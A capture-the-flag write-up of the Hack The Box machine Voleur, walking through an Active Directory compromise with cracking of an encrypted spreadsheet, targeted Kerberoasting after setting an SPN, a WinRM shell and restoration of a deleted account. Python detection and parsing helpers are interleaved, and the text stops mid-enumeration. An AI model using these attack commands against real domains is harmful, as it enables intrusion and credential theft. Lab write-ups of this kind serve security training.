by 0xW1LD
Throughout this writeup I use a variety of environment variables that I set to make it easier on myself to use the commands through my terminal’s command history.
```bash
DC=dc.voleur.htb
TARGET=<ip address>
DOMAIN=voleur.htb
D=voleur.htb
USER=ryan.naylor
PASS=HollowOct31Nyt
```
Note that these can change throughout the writeup, especially the USER and PASS variables; where it is not mentioned, assume they hold the most recently obtained credentials or hash.
As is common in real-life Windows pentests, you start the Voleur box with credentials for the following account:
ryan.naylor/HollowOct31Nyt
As usual we start off with an nmap scan.
```
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
2222/tcp open EtherNetIP-1
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49667/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
58802/tcp open unknown
58813/tcp open unknown
58828/tcp open unknown
```
Most of the ports are standard for an Active Directory domain controller, but one stands out: 2222.
A more thorough service and script scan shows that it's running OpenSSH on Ubuntu:
```
2222/tcp open ssh syn-ack ttl 127 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+vH6cIy1hEFJoRs8wB3O/XIIg4X5gPQ8XIFAiqJYvSE7viX8cyr2UsxRAt0kG2mfbNIYZ+80o9bpXJ/M2Nhv1VRi4jMtc+5boOttHY1CEteMGF6EF6jNIIjVb9F5QiMiNNJea1wRDQ2buXhRoI/KmNMp+EPmBGB7PKZ+hYpZa
vF0EKKTC8HEHvyYDS4CcYfR0pNwIfaxT57rSCAdcFBcOUxKWOiRBK1Rv8QBwxGBhpfFngayFj8ewOOJHaqct4OQ3JUicetvox6kG8si9r0GRigonJXm0VMi/aFvZpJwF40g7+oG2EVu/sGSR6d6t3ln5PNCgGXw95pgYR4x9fLpn/OwK6tugAjeZMla3Mybmn3dXUc5BKqVNHQCMIS
6rlIfHZiF114xVGuD9q89atGxL0uTlBOuBizTaF53Z//yBlKSfvXxW4ShH6F8iE1U8aNY92gUejGclVtFCFszYBC2FvGXivcKWsuSLMny++ZkcE4X7tUBQ+CuqYYK/5TfxmIs=
| 256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMkGDGeRmex5q16ficLqbT7FFvQJxdJZsJ01vdVjKBXfMIC/oAcLPRUwu5yBZeQoOvWF8yIVDN/FJPeqjT9cgxg=
| 256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILv295drVe3lopPEgZsjMzOVlk4qZZfFz1+EjXGebLCR
```
An SSH service on a Windows host like this may indicate one of three things:
- Docker
- WSL
- Virtual Machine

Attempting to authenticate to the machine over SMB using the assumed-breach credentials we were given, it looks like NTLM is disabled.
```
nxc smb $DC -u $USER -p $PASS
SMB 10.129.110.234 445 10.129.110.234 [*] x64 (name:10.129.110.234) (domain:10.129.110.234) (signing:True) (SMBv1:False) (NTLM:False)
SMB 10.129.110.234 445 10.129.110.234 [-] 10.129.110.234\ryan.naylor:HollowOct31Nyt STATUS_NOT_SUPPORTED
```
So instead let’s try to authenticate using Kerberos. Let’s first ensure that our clock is synced to the box.
```
sudo ntpdate $DOMAIN
2025-07-08 18:12:29.185245 (-0400) +28793.425717 +/- 0.152090 voleur.htb 10.129.110.234 s1 no-leap
CLOCK: time stepped by 28793.425717
```
Now let’s check smb authentication specifying the -k flag to force the usage of the Kerberos protocol.
```
nxc smb $DC -u $USER -p $PASS -d $DOMAIN -k
SMB DC.voleur.htb 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC.voleur.htb 445 DC [+] voleur.htb\ryan.naylor:HollowOct31Nyt
```
Success! Let's start by enumerating the domain objects.
I am using rid-brute here because I found that it's more thorough, though noisier as well, and it provides us with 3 of the 4 objects I want to enumerate.
```
nxc smb $DC -u $USER -p $PASS -d $DOMAIN -k --rid-brute
SMB DC.voleur.htb 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC.voleur.htb 445 DC [+] voleur.htb\ryan.naylor:HollowOct31Nyt
SMB DC.voleur.htb 445 DC 498: VOLEUR\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB DC.voleur.htb 445 DC 500: VOLEUR\Administrator (SidTypeUser)
SMB DC.voleur.htb 445 DC 501: VOLEUR\Guest (SidTypeUser)
SMB DC.voleur.htb 445 DC 502: VOLEUR\krbtgt (SidTypeUser)
SMB DC.voleur.htb 445 DC 512: VOLEUR\Domain Admins (SidTypeGroup)
SMB DC.voleur.htb 445 DC 513: VOLEUR\Domain Users (SidTypeGroup)
SMB DC.voleur.htb 445 DC 514: VOLEUR\Domain Guests (SidTypeGroup)
SMB DC.voleur.htb 445 DC 515: VOLEUR\Domain Computers (SidTypeGroup)
SMB DC.voleur.htb 445 DC 516: VOLEUR\Domain Controllers (SidTypeGroup)
SMB DC.voleur.htb 445 DC 517: VOLEUR\Cert Publishers (SidTypeAlias)
SMB DC.voleur.htb 445 DC 518: VOLEUR\Schema Admins (SidTypeGroup)
SMB DC.voleur.htb 445 DC 519: VOLEUR\Enterprise Admins (SidTypeGroup)
SMB DC.voleur.htb 445 DC 520: VOLEUR\Group Policy Creator Owners (SidTypeGroup)
SMB DC.voleur.htb 445 DC 521: VOLEUR\Read-only Domain Controllers (SidTypeGroup)
SMB DC.voleur.htb 445 DC 522: VOLEUR\Cloneable Domain Controllers (SidTypeGroup)
SMB DC.voleur.htb 445 DC 525: VOLEUR\Protected Users (SidTypeGroup)
SMB DC.voleur.htb 445 DC 526: VOLEUR\Key Admins (SidTypeGroup)
SMB DC.voleur.htb 445 DC 527: VOLEUR\Enterprise Key Admins (SidTypeGroup)
SMB DC.voleur.htb 445 DC 553: VOLEUR\RAS and IAS Servers (SidTypeAlias)
SMB DC.voleur.htb 445 DC 571: VOLEUR\Allowed RODC Password Replication Group (SidTypeAlias)
SMB DC.voleur.htb 445 DC 572: VOLEUR\Denied RODC Password Replication Group (SidTypeAlias)
SMB DC.voleur.htb 445 DC 1000: VOLEUR\DC$ (SidTypeUser)
SMB DC.voleur.htb 445 DC 1101: VOLEUR\DnsAdmins (SidTypeAlias)
SMB DC.voleur.htb 445 DC 1102: VOLEUR\DnsUpdateProxy (SidTypeGroup)
SMB DC.voleur.htb 445 DC 1103: VOLEUR\ryan.naylor (SidTypeUser)
SMB DC.voleur.htb 445 DC 1104: VOLEUR\marie.bryant (SidTypeUser)
SMB DC.voleur.htb 445 DC 1105: VOLEUR\lacey.miller (SidTypeUser)
SMB DC.voleur.htb 445 DC 1106: VOLEUR\svc_ldap (SidTypeUser)
SMB DC.voleur.htb 445 DC 1107: VOLEUR\svc_backup (SidTypeUser)
SMB DC.voleur.htb 445 DC 1108: VOLEUR\svc_iis (SidTypeUser)
SMB DC.voleur.htb 445 DC 1109: VOLEUR\jeremy.combs (SidTypeUser)
SMB DC.voleur.htb 445 DC 1112: VOLEUR\First-Line Technicians (SidTypeGroup)
SMB DC.voleur.htb 445 DC 1113: VOLEUR\Second-Line Technicians (SidTypeGroup)
SMB DC.voleur.htb 445 DC 1114: VOLEUR\Third-Line Technicians (SidTypeGroup)
SMB DC.voleur.htb 445 DC 1601: VOLEUR\svc_winrm (SidTypeUser)
SMB DC.voleur.htb 445 DC 1602: VOLEUR\Restore_Users (SidTypeGroup)
```
I'm already seeing a couple of interesting targets, namely the service accounts, the Restore_Users group, and the multiple tiers of technician groups.
Next let's use the spider_plus module of nxc to spider the SMB shares.
```
nxc smb $DC -u $USER -p $PASS -d $DOMAIN -k -M spider_plus
SMB DC.voleur.htb 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC.voleur.htb 445 DC [+] voleur.htb\ryan.naylor:HollowOct31Nyt
SPIDER_PLUS DC.voleur.htb 445 DC [*] Started module spidering_plus with the following options:
SPIDER_PLUS DC.voleur.htb 445 DC [*] DOWNLOAD_FLAG: False
SPIDER_PLUS DC.voleur.htb 445 DC [*] STATS_FLAG: True
SPIDER_PLUS DC.voleur.htb 445 DC [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS DC.voleur.htb 445 DC [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS DC.voleur.htb 445 DC [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS DC.voleur.htb 445 DC [*] OUTPUT_FOLDER: /home/kali/.nxc/modules/nxc_spider_plus
SMB DC.voleur.htb 445 DC [*] Enumerated shares
SMB DC.voleur.htb 445 DC Share Permissions Remark
SMB DC.voleur.htb 445 DC ----- ----------- ------
SMB DC.voleur.htb 445 DC ADMIN$ Remote Admin
SMB DC.voleur.htb 445 DC C$ Default share
SMB DC.voleur.htb 445 DC Finance
SMB DC.voleur.htb 445 DC HR
SMB DC.voleur.htb 445 DC IPC$ READ Remote IPC
SMB DC.voleur.htb 445 DC IT READ
SMB DC.voleur.htb 445 DC NETLOGON READ Logon server share
SMB DC.voleur.htb 445 DC SYSVOL READ Logon server share
SPIDER_PLUS DC.voleur.htb 445 DC [+] Saved share-file metadata to "/home/kali/.nxc/modules/nxc_spider_plus/DC.voleur.htb.json".
SPIDER_PLUS DC.voleur.htb 445 DC [*] SMB Shares: 8 (ADMIN$, C$, Finance, HR, IPC$, IT, NETLOGON, SYSVOL)
SPIDER_PLUS DC.voleur.htb 445 DC [*] SMB Readable Shares: 4 (IPC$, IT, NETLOGON, SYSVOL)
SPIDER_PLUS DC.voleur.htb 445 DC [*] SMB Filtered Shares: 1
SPIDER_PLUS DC.voleur.htb 445 DC [*] Total folders found: 27
SPIDER_PLUS DC.voleur.htb 445 DC [*] Total files found: 7
SPIDER_PLUS DC.voleur.htb 445 DC [*] File size average: 3.55 KB
SPIDER_PLUS DC.voleur.htb 445 DC [*] File size min: 22 B
SPIDER_PLUS DC.voleur.htb 445 DC [*] File size max: 16.5 KB
```
It looks like we have read access to the non-default share IT.
Looking at the gathered metadata, we can see an interesting file in the IT share named Access_Review.xlsx:
```
cat DC.voleur.htb.json
{
"IT": {
"First-Line Support/Access_Review.xlsx": {
"atime_epoch": "2025-01-31 04:09:27",
"ctime_epoch": "2025-01-29 04:39:51",
"mtime_epoch": "2025-05-29 18:23:36",
"size": "16.5 KB"
}
},
```
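As an added example (not part of the original writeup or of nxc itself), here is a small Python helper that walks the spider_plus metadata JSON in the shape shown above, converts the human-readable sizes back to bytes and lists document types worth a closer look first. The IT entry in the embedded sample mirrors the output above; the SYSVOL entry is constructed to exercise a second share.

```python
import json
import re

# Metadata in the shape nxc's spider_plus module writes to
# ~/.nxc/modules/nxc_spider_plus/<host>.json. The IT entry mirrors the
# writeup's output; the SYSVOL entry is constructed for the example.
SAMPLE_JSON = """{
  "IT": {
    "First-Line Support/Access_Review.xlsx": {
      "atime_epoch": "2025-01-31 04:09:27",
      "ctime_epoch": "2025-01-29 04:39:51",
      "mtime_epoch": "2025-05-29 18:23:36",
      "size": "16.5 KB"
    }
  },
  "SYSVOL": {
    "voleur.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
      "atime_epoch": "2025-01-29 04:10:01",
      "ctime_epoch": "2025-01-29 04:10:01",
      "mtime_epoch": "2025-01-29 04:10:01",
      "size": "22 B"
    }
  }
}"""

SIZE_RE = re.compile(r"^\s*(\d+(?:\.\d+)?)\s*(B|KB|MB|GB)\s*$", re.IGNORECASE)
UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}

# Extensions that usually deserve a manual look on an internal share:
# office documents, password stores, scripts and configuration files.
INTERESTING_EXTS = {".xlsx", ".xls", ".docx", ".doc", ".txt", ".kdbx",
                    ".config", ".xml", ".ini", ".ps1", ".bat", ".vbs"}


def parse_size(text):
    """Convert spider_plus's '16.5 KB' style size string back to bytes."""
    m = SIZE_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised size: {text!r}")
    return int(float(m.group(1)) * UNITS[m.group(2).upper()])


def list_files(metadata):
    """Flatten {share: {path: attrs}} into records, interesting files first,
    then largest first within each group."""
    records = []
    for share, entries in metadata.items():
        for path, attrs in entries.items():
            name = path.rsplit("/", 1)[-1]
            ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
            records.append({
                "share": share,
                "path": path,
                "size": parse_size(attrs["size"]),
                # despite the field name, spider_plus stores a formatted timestamp here
                "mtime": attrs["mtime_epoch"],
                "interesting": ext in INTERESTING_EXTS,
            })
    records.sort(key=lambda r: (not r["interesting"], -r["size"]))
    return records


if __name__ == "__main__":
    for r in list_files(json.loads(SAMPLE_JSON)):
        flag = "*" if r["interesting"] else " "
        print(f"{flag} {r['size']:>8} B  {r['mtime']}  {r['share']}/{r['path']}")
```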
Let's grab this file. Since NTLM isn't supported, we need to authenticate with Kerberos; first, let's generate a krb5 config file.
```bash
LOWER_REALM=$DOMAIN
UPPER_REALM=$(echo "$LOWER_REALM" | tr '[:lower:]' '[:upper:]')
DC_HOSTNAME='DC'
# Unquoted heredoc, so the shell expands the variables straight into the config
cat << EOF > custom_krb5.conf
[libdefaults]
    default_realm = $UPPER_REALM
    dns_lookup_realm = true
    dns_lookup_kdc = true

[realms]
    $UPPER_REALM = {
        kdc = $DC_HOSTNAME.$LOWER_REALM
        admin_server = $DC_HOSTNAME.$LOWER_REALM
        default_domain = $LOWER_REALM
    }

[domain_realm]
    $LOWER_REALM = $UPPER_REALM
    .$LOWER_REALM = $UPPER_REALM
EOF
export KRB5_CONFIG=$(pwd)/custom_krb5.conf
```
Next let’s start an authentication, which will grab us a ccache file.
```
kinit $USER
Password for ryan.naylor@VOLEUR.HTB:
sudo klist
Ticket cache: FILE:/ryan.naylor.ccache
Default principal: ryan.naylor@VOLEUR.HTB
Valid starting Expires Service principal
07/08/2025 18:58:50 07/09/2025 04:58:50 krbtgt/VOLEUR.HTB@VOLEUR.HTB
renew until 07/09/2025 18:58:47
```
Now let’s authenticate to smb using smbclient and grab the file.
```
smbclient //$DC/IT --use-kerberos required --use-krb5-ccache /ryan.naylor.ccache
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 29 04:10:01 2025
.. DHS 0 Mon Jun 30 17:08:33 2025
First-Line Support D 0 Wed Jan 29 04:40:17 2025
5311743 blocks of size 4096. 877321 blocks available
smb: \> cd "First-Line Support"
smb: \First-Line Support\> ls
. D 0 Wed Jan 29 04:40:17 2025
.. D 0 Wed Jan 29 04:10:01 2025
Access_Review.xlsx A 16896 Thu Jan 30 09:14:25 2025
5311743 blocks of size 4096. 877321 blocks available
smb: \First-Line Support\> get Access_Review.xlsx
getting file \First-Line Support\Access_Review.xlsx of size 16896 as Access_Review.xlsx (12.8 KiloBytes/sec) (average 12.8 KiloBytes/sec)
```
Taking a look at the file we can see that it’s encrypted.
```
file Access_Review.xlsx
Access_Review.xlsx: CDFV2 Encrypted
```
Let's attempt to crack this using office2john and John the Ripper.
```
office2john Access_Review.xlsx > Access_Review.pem
john --wordlist=/usr/share/wordlists/rockyou.txt Access_Review.pem
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
football1 (Access_Review.xlsx)
1g 0:00:00:10 DONE (2025-07-08 19:05) 0.09505g/s 76.04p/s 76.04c/s 76.04C/s football1..martha
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
Let's use this password to open the xlsx file, in which we find the following information.

| User | Job Title | Permissions | Notes |
| -------------------- | ------------------------------ | ------------------------ | --------------------------------------------------------------------- |
| Ryan.Naylor | First-Line Support Technician | SMB | Has Kerberos Pre-Auth disabled temporarily to test legacy systems. |
| Marie.Bryant | First-Line Support Technician | SMB | |
| Lacey.Miller | Second-Line Support Technician | Remote Management Users | |
| Todd.Wolfe | Second-Line Support Technician | Remote Management Users | Leaver. Password was reset to [REDACTED] and account deleted. |
| Jeremy.Combs | Third-Line Support Technician | Remote Management Users. | Has access to Software folder. |
| Administrator | Administrator | Domain Admin | Not to be used for daily tasks! |
| | | | |
| **Service Accounts** | | | |
| svc_backup | | Windows Backup | Speak to Jeremy! |
| svc_ldap | | LDAP Services | P/W - [REDACTED] |
| svc_iis | | IIS Administration | P/W - [REDACTED] |
| svc_winrm | | Remote Management | Need to ask Lacey as she reset this recently. |

Looks like we have the following credentials:
- Todd.Wolfe:[REDACTED] (account deleted; the Restore_Users group could come in handy)
- svc_ldap:[REDACTED]
- svc_iis:[REDACTED]

Attempting authentication, we can authenticate with both service accounts, so we have successfully gotten a foothold!
Checking svc_ldap's permissions, we find that we have write ACLs over the Second-Line Support Technicians OU, Lacey Miller (who is a member of that OU), and svc_winrm:
```
bloodyAD --host $DC --dc-ip $TARGET -d $DOMAIN -u $USER -p $PASS -k get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=voleur,DC=htb
permission: WRITE
distinguishedName: OU=Second-Line Support Technicians,DC=voleur,DC=htb
permission: CREATE_CHILD; WRITE
distinguishedName: CN=Lacey Miller,OU=Second-Line Support Technicians,DC=voleur,DC=htb
permission: CREATE_CHILD; WRITE
distinguishedName: CN=svc_ldap,OU=Service Accounts,DC=voleur,DC=htb
permission: WRITE
distinguishedName: CN=svc_winrm,OU=Service Accounts,DC=voleur,DC=htb
permission: WRITE
```
The most obvious path here would be some sort of generic-write attack on svc_winrm or Lacey Miller.
After attempting a few things, I was unable to do anything with Lacey Miller, so instead I targeted svc_winrm. Since this is a service account, I decided to Kerberoast it. Let's ensure that the target has a valid SPN (our write access over the object lets us set one).
```
bloodyAD --host $DC --dc-ip $TARGET -d $DOMAIN -u $USER -p $PASS -k set object svc_winrm servicePrincipalName -v "voleur/w1ld"
[+] svc_winrm's servicePrincipalName has been updated
```
Next let’s kerberoast the account and grab the TGS.
```
nxc ldap $DC -u $USER -p $PASS -k --kerberoasting kerberoast.txt
LDAP dc.voleur.htb 389 DC [*] None (name:DC) (domain:voleur.htb)
LDAP dc.voleur.htb 389 DC [+] voleur.htb\svc_ldap:[REDACTED]
LDAP dc.voleur.htb 389 DC [*] Skipping disabled account: krbtgt
LDAP dc.voleur.htb 389 DC [*] Total of records returned 1
LDAP dc.voleur.htb 389 DC [*] sAMAccountName: svc_winrm, memberOf: CN=Remote Management Users,CN=Builtin,DC=voleur,DC=htb, pwdLastSet: 2025-01-31 04:10:12.398769, lastLogon: 2025-01-29 10:07:32.711487
LDAP dc.voleur.htb 389 DC $krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb\svc_winrm*$3cd6[REDACTED]
```
Now we can attempt to crack the TGS using hashcat.
```
hashcat -a 0 kerberoast.txt /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb\svc_winrm*$3cd6f0dd9582e5f920e48c0cdb80b552$2738f56ab656d4bf9d1b229ead61a79df09fa4d2dbee412bc73cd031164ea2ccb2bdc3baffe21ad54f6e628630332046e53ae0ea472e5710677580fbb
[REDACTED]:[REDACTED]
```
Success! We’ve cracked the credentials.
svc_winrm:[REDACTED]
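The `$krb5tgs$23$` tag on the ticket above is what made this crackable offline: etype 23 is RC4-HMAC, keyed directly from the account's NT hash. As an added example (not from the writeup or any tool it uses), the Python below splits that hash format into its fields and, from the defender's side, flags the matching signature in Windows 4769 (service ticket requested) events: a successful RC4 ticket request for a non-machine, non-krbtgt account. The 4769 records and the ticket bytes in the sample are constructed; the account names and checksum mirror the output above.

```python
import re
from collections import defaultdict

# Kerberos encryption types as they appear in the hashcat/John tag ($krb5tgs$<etype>$)
# and in the TicketEncryptionType field of Windows event 4769 (0x17 == 23).
ETYPE_NAMES = {23: "RC4-HMAC", 17: "AES128-CTS-HMAC-SHA1-96", 18: "AES256-CTS-HMAC-SHA1-96"}

# Layout nxc --kerberoasting writes for etype 23 (AES tickets use a different layout):
#   $krb5tgs$23$*<user>$<REALM>$<spn>*$<checksum>$<encrypted ticket part>
KRB5TGS23_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>23)\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)

# Constructed sample: names and checksum as in the writeup, ticket bytes are dummy.
SAMPLE_LINE = ("$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb\\svc_winrm*"
               "$3cd6f0dd9582e5f920e48c0cdb80b552$" + "ab" * 24)


def parse_krb5tgs(line):
    """Split an etype-23 kerberoast line into its fields, or None if it does not match."""
    m = KRB5TGS23_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d["etype"] = int(d["etype"])
    d["etype_name"] = ETYPE_NAMES[d["etype"]]
    return d


# Constructed 4769 records with the fields a defender would pull from Security.evtx.
# The requesting IP is a made-up attacker address, not one captured from the box.
SAMPLE_4769 = [
    {"EventID": 4769, "TargetUserName": "svc_ldap@VOLEUR.HTB", "ServiceName": "svc_winrm",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.10.14.5"},
    {"EventID": 4769, "TargetUserName": "svc_ldap@VOLEUR.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.10.14.5"},
    {"EventID": 4769, "TargetUserName": "jeremy.combs@VOLEUR.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.129.110.234"},
    {"EventID": 4768, "TargetUserName": "todd.wolfe", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.10.14.5"},
]


def flag_kerberoast(events):
    """Return {requesting account: [service accounts]} for successful 4769 events that
    asked for an RC4 (0x17) service ticket to a non-machine, non-krbtgt account.
    Clients in an AES-capable domain normally request 0x12/0x11, so RC4 tickets for
    user SPNs are the classic Kerberoasting signature worth alerting on."""
    hits = defaultdict(list)
    for ev in events:
        if ev.get("EventID") != 4769 or ev.get("Status") != "0x0":
            continue
        svc = ev["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        if int(ev["TicketEncryptionType"], 16) == 23:
            hits[ev["TargetUserName"]].append(svc)
    return dict(hits)


if __name__ == "__main__":
    print(parse_krb5tgs(SAMPLE_LINE))
    print(flag_kerberoast(SAMPLE_4769))
```

Pairing the 4769 match with a preceding 5136 (directory object modified) event on the same account's servicePrincipalName catches the targeted variant used here, where the SPN was added just before the ticket was requested.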
We're a member of Remote Management Users, so let's use WinRM.
```
kinit $USER
Password for svc_winrm@VOLEUR.HTB:
evil-winrm -i $DC -r $DOMAIN
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_winrm\Documents>
```
Just like that, we have User!
Recall the deleted account Todd.Wolfe. Looking around further, it turns out svc_ldap is part of the Restore_Users group.
```
bloodyAD --host $DC --dc-ip $TARGET -d $DOMAIN -u $USER -p $PASS -k get object svc_ldap
memberOf: CN=Restore_Users,DC=voleur,DC=htb
```
We can confirm that we have the Reanimate Tombstone permission by checking the ACLs on the DC.
```
bloodyAD --host $DC --dc-ip $TARGET -d $DOMAIN -u $USER -p $PASS -k get object "DC=voleur,DC=HTB" --resolve-sd
nTSecurityDescriptor.ACL.3.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.3.Trustee: Restore_Users
nTSecurityDescriptor.ACL.3.Right: CONTROL_ACCESS
nTSecurityDescriptor.ACL.3.ObjectType: Reanimate-Tombstones
```
Looks like we have all we need; let's attempt to restore todd.wolfe.
```
bloodyAD --host $DC --dc-ip $TARGET -d $DOMAIN -u $USER -p $PASS -k set restore todd.wolfe
[+] todd.wolfe has been restored successfully under CN=Todd Wolfe,OU=Second-Line Support Technicians,DC=voleur,DC=htb
```
You'll need the latest version of bloodyAD to use the restore function; you can use pip to install it.
Nice, now let’s attempt to authenticate as todd.wolfe using the credentials we found earlier. At the same time we can use the whoami module to check our group membership and other information.
```
nxc ldap $DC -u $USER -p $PASS -k -M whoami
LDAP dc.voleur.htb 389 DC [*] None (name:DC) (domain:voleur.htb)
LDAP dc.voleur.htb 389 DC [+] voleur.htb\todd.wolfe:[REDACTED]
WHOAMI dc.voleur.htb 389 DC description: Second-Line Support Technician
WHOAMI dc.voleur.htb 389 DC distinguishedName: CN=Todd Wolfe,OU=Second-Line Support Technicians,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC Member of: CN=Second-Line Technicians,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC Member of: CN=Remote Management Users,CN=Builtin,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC name: Todd Wolfe
WHOAMI dc.voleur.htb 389 DC Enabled: Yes
WHOAMI dc.voleur.htb 389 DC Password Never Expires: Yes
WHOAMI dc.voleur.htb 389 DC Last logon: 133964933318134123
WHOAMI dc.voleur.htb 389 DC pwdLastSet: 133826280731790960
WHOAMI dc.voleur.htb 389 DC logonCount: 5
WHOAMI dc.voleur.htb 389 DC sAMAccountName: todd.wolfe
```
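The whoami module prints lastLogon and pwdLastSet as raw Windows FILETIME integers (100 ns ticks since 1601-01-01 UTC), which is why they look nothing like the other timestamps on this page. As an added example (not part of the writeup or of nxc), this Python parses the WHOAMI lines above into a dict and converts those two fields into real datetimes; the sample input is the todd.wolfe output reused verbatim.

```python
from datetime import datetime, timedelta, timezone

# FILETIME counts 100 ns ticks from 1601-01-01 00:00 UTC; Active Directory stores
# lastLogon and pwdLastSet this way and nxc's whoami module prints the raw integer.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
FILETIME_FIELDS = {"Last logon", "pwdLastSet"}


def filetime_to_datetime(ticks):
    """Convert a FILETIME integer to a timezone-aware datetime; 0 means 'never'."""
    if ticks == 0:
        return None
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def parse_whoami(lines):
    """Turn the WHOAMI lines of 'nxc ldap ... -M whoami' into a dict.
    'Member of' entries are collected in a list; FILETIME fields become datetimes."""
    info = {"Member of": []}
    for line in lines:
        parts = line.split(None, 4)  # WHOAMI <host> <port> <name> <key: value>
        if len(parts) < 5 or parts[0] != "WHOAMI":
            continue
        key, sep, value = parts[4].partition(": ")
        if not sep:
            continue
        if key == "Member of":
            info[key].append(value)
        elif key in FILETIME_FIELDS:
            info[key] = filetime_to_datetime(int(value))
        else:
            info[key] = value
    return info


# The todd.wolfe output from the writeup, reused verbatim as sample input.
SAMPLE_WHOAMI = """\
LDAP dc.voleur.htb 389 DC [*] None (name:DC) (domain:voleur.htb)
WHOAMI dc.voleur.htb 389 DC description: Second-Line Support Technician
WHOAMI dc.voleur.htb 389 DC distinguishedName: CN=Todd Wolfe,OU=Second-Line Support Technicians,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC Member of: CN=Second-Line Technicians,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC Member of: CN=Remote Management Users,CN=Builtin,DC=voleur,DC=htb
WHOAMI dc.voleur.htb 389 DC name: Todd Wolfe
WHOAMI dc.voleur.htb 389 DC Enabled: Yes
WHOAMI dc.voleur.htb 389 DC Password Never Expires: Yes
WHOAMI dc.voleur.htb 389 DC Last logon: 133964933318134123
WHOAMI dc.voleur.htb 389 DC pwdLastSet: 133826280731790960
WHOAMI dc.voleur.htb 389 DC logonCount: 5
WHOAMI dc.voleur.htb 389 DC sAMAccountName: todd.wolfe
""".splitlines()


if __name__ == "__main__":
    for key, value in parse_whoami(SAMPLE_WHOAMI).items():
        print(f"{key}: {value}")
```

The converted pwdLastSet (2025-01-29 12:41 UTC) lines up with the archived profile's file times and the DPAPI credential's LastWritten stamp later in the writeup, a useful cross-check when reconstructing an account's history.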
We can see that we’re a member of Second-Line Technicians, let’s check if we have additional access to other folders in the IT share or other shares.
```
echo $PASS | kinit $USER
Password for todd.wolfe@VOLEUR.HTB:
klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: todd.wolfe@VOLEUR.HTB
Valid starting Expires Service principal
07/08/2025 20:17:03 07/09/2025 06:17:03 krbtgt/VOLEUR.HTB@VOLEUR.HTB
renew until 07/09/2025 20:17:02
```
Looking around the IT share, we can now access a different folder called Second-Line Support, where we find an Archived Users folder containing todd.wolfe with what looks like the user's archived home directory.
```
smbclient //$DC/IT --use-kerberos required --use-krb5-ccache /tmp/krb5cc_1000
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 29 04:10:01 2025
.. DHS 0 Mon Jun 30 17:08:33 2025
Second-Line Support D 0 Wed Jan 29 10:13:03 2025
5311743 blocks of size 4096. 873443 blocks available
smb: \> cd "Second-Line Support"
